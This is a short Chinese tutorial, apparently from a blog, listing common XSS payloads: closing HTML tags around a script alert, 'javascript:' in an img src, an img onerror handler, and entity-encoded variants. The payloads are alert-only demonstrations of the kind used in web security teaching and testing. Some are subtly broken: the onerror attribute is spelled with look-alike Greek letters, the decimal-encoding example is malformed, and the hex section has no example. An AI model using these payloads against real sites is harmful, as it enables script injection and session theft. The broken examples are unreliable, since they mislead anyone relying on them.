常见的XSS代码分析
1.闭合“<”,“>” 1)***者可以构建如下语句来闭合HTML标记,构造出完整无错的脚步语句 ><script>alert('XSS');</script>< 2)在提交上面代码闭合HTML代码后,出现如下的代码 <A HREF="" >script>alert('XSS');</script><"">XSS测试</A> 2.属性中的javascript <img src=" javascript :alert ('xss');"> 3.事件类XSS代码 注:img有一个可以被XSS利用的onerror()事件,当img含有一个 onerror ()事件而正 好图片没有正常输入的时候,可以加入任意脚步代码如下 <img src=" " οnerrοr=alert('XSS')> 4.编码后的XSS代码 XSS转码只需要针对属性锁赋值的值进行就可以,上面经典XSS代码为例 <img src=" javascript :alert ('xss');"> 进过“&# ”+ASCII的方式处理以后,变成代码 1)利用十进制转码 <img src="%#106avascript:a&108&# 101rt('XSS');>" 2)同理利用十六进制转码